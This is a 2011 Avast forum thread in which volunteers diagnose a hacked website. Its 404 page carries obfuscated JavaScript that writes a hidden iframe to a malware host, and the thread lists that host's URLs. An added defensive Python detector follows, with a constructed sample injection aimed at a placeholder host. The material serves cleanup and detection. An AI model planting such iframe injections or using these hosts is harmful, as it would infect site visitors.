Author Topic: JS:ScriptUE in hxxp://www.erlotelebista.com

acv

  • Guest
JS:ScriptUE in hxxp://www.erlotelebista.com
« on: June 13, 2011, 06:19:09 PM »
Hello,
our site hxxp://www.erlotelebista.com/

Avast is still showing it as containing a URL:Mal, is it a blacklist of Avast?

No other antivirus is detecting anything now. Also this is proof of the lack of any infection right now.

Thanks in advance.

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 89438
  • No support PMs thanks
Re: JS:ScriptUE in hxxp://www.erlotelebista.com
« Reply #1 on: June 13, 2011, 07:38:00 PM »
Your site appears to have been hacked: there is no favicon (or a hacked favicon.ico file), and there is a call for it which generates a 404 error page, which has most certainly been hacked, http://www.virustotal.com/file-scan/report.html?id=df15fc444d130b29c31f1a48d382f3f2072b84668b4d5976deb98aef8e82cdd3-1307985672.

Other image files also appear to have been hacked.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.6.6121 (build 24.6.9241.848) UI 1.0.809/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33983
  • malware fighter
Re: JS:ScriptUE in hxxp://www.erlotelebista.com
« Reply #2 on: June 13, 2011, 10:31:36 PM »
Hi acv,

Those that visit the site will get an avast Web Shield warning for JS:ScriptUE-inf[Trj] in -htxp://etc...... logo.png
The site was hacked via a vulnerability; web admins should check their PHP and Joomla website application software for updates:
parts of the code could still be Joomla 1.5.18 and not 1.5.21.

PHP version is PHP/5.1.6, a version open to some recent bypass vulnerabilities, 3 known to the software developer.

polonus

P.S. The code attached could be replaced to make the webpage more IE friendly...
this is because the site runs Apache...
see: http://wepawet.iseclab.org/view.php?hash=e1667a2bc5725a999462548a2981bb71&t=1307997764&type=js

D
« Last Edit: June 13, 2011, 10:56:59 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

spg SCOTT

  • Guest
Re: JS:ScriptUE in hxxp://www.erlotelebista.com
« Reply #3 on: June 13, 2011, 10:54:40 PM »
Just for more information, the script that David has pointed out, contained in the hacked 404 page, deobfuscates to an iframe, pointing to a site that is known for malware:

http://hosts-file.net/?s=213.182.197.42&view=matches

Interesting to note, the difference in detection at VT:
http://www.virustotal.com/file-scan/report.html?id=7ecef262a30618ec1b38b9b56931f35a059b9b0591b342a5f208fd75185394a3-1307997688
This is the iframe in my image as it is in a text file.
Seems detection is better on the obfuscation than the content?

(Though I imagine that VT overlooks some elements of the scanning...)

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33983
  • malware fighter
Re: JS:ScriptUE in hxxp://www.erlotelebista.com
« Reply #4 on: June 13, 2011, 11:11:24 PM »
Hi spg SCOTT,

Thank you for that additional information, but most of the malware that resided there gives no response now, so it is dead. It had two unknown executables and some EXP/Pidief.W malware, in resp.

-http://213.182.197.42/swf.php,
-http://213.182.197.42/load.php,
-http://213.182.197.42/pdf.php

also see: http://www.spamhaus.org/sbl/sbl.lasso?query=SBL75831

polonus
« Last Edit: June 13, 2011, 11:42:10 PM by polonus »

acv

  • Guest
Re: JS:ScriptUE in hxxp://www.erlotelebista.com
« Reply #5 on: June 14, 2011, 05:29:30 PM »
Hello,

How can I find where is the malware?

Thanks a lot

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 89438
  • No support PMs thanks
Re: JS:ScriptUE in hxxp://www.erlotelebista.com
« Reply #6 on: June 14, 2011, 06:04:24 PM »
Click the images to expand; they will show some of the images, etc. that I had alerts on.

They appear to have the same insertion point: the failed loading of those images results in the 404 error page, which has been hacked with the insertion of an obfuscated javascript document.write above the opening <head> tag.

- See http://www.scmagazineus.com/Every-36-seconds-a-website-is-infected/article/140414/.
- Also see, Help: I Got Hacked. Now What Do I Do? http://technet.microsoft.com/de-de/library/cc512587%28en-us%29.aspx.
- Also see, Tips for Cleaning & Securing Your Website, http://www.stopbadware.org/home/security.
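As an added, defender-side example (not code from this thread, from avast or from the site owner): a small Python checker for the exact pattern DavidR describes, a document.write script block injected above the opening <head> tag that decodes to a hidden iframe. The 404 page and the example.invalid URL are constructed placeholders; the decoder only undoes the unescape('%XX') and String.fromCharCode() wrappers, anything else gets flagged for manual review.

```python
import re
from urllib.parse import unquote

# Constructed sample 404 page: an obfuscated document.write block injected
# above the opening <head> tag, which is the insertion point described above.
# The example.invalid URL is a placeholder, not an indicator from the thread.
SAMPLE_404 = (
    "<html>\n"
    "<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2F"
    "example.invalid%2Fload.php%22%20width%3D1%20height%3D1%3E%3C%2Fiframe%3E'))"
    "</script>\n"
    "<head><title>404 Not Found</title></head>\n"
    "<body><h1>Not Found</h1></body></html>\n"
)

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
UNESCAPE_RE = re.compile(r"unescape\(\s*['\"]([^'\"]*)['\"]\s*\)", re.I)
CHARCODE_RE = re.compile(r"String\.fromCharCode\(([\d\s,]+)\)")
IFRAME_SRC_RE = re.compile(r"<iframe\b[^>]*\bsrc\s*=\s*['\"]?([^'\" >]+)", re.I)

def decode_layer(js):
    """Statically undo two common wrappers, unescape('%XX..') and
    String.fromCharCode(n, n, ...); %uXXXX and eval packers are left as-is."""
    out = UNESCAPE_RE.sub(lambda m: unquote(m.group(1)), js)
    out = CHARCODE_RE.sub(
        lambda m: "".join(chr(int(c)) for c in m.group(1).split(",") if c.strip()),
        out,
    )
    return out

def find_injected_scripts(html):
    """Return script bodies that call document.write and sit before the
    opening <head> tag (or anywhere, if the page has no <head> at all)."""
    head_pos = html.lower().find("<head")
    hits = []
    for m in SCRIPT_RE.finditer(html):
        if head_pos != -1 and m.start() > head_pos:
            continue
        if "document.write" in m.group(1):
            hits.append(m.group(1))
    return hits

def extract_iframe_targets(html):
    """Decode each suspicious script and pull out the iframe src values;
    these are the indicators to block and to grep for across the web root."""
    targets = []
    for js in find_injected_scripts(html):
        targets.extend(IFRAME_SRC_RE.findall(decode_layer(js)))
    return targets
```

Run extract_iframe_targets over every HTML, PHP and template file under the web root (and the custom 404 page) to locate the injected block; the reported src is what the Web Shield alert is reacting to.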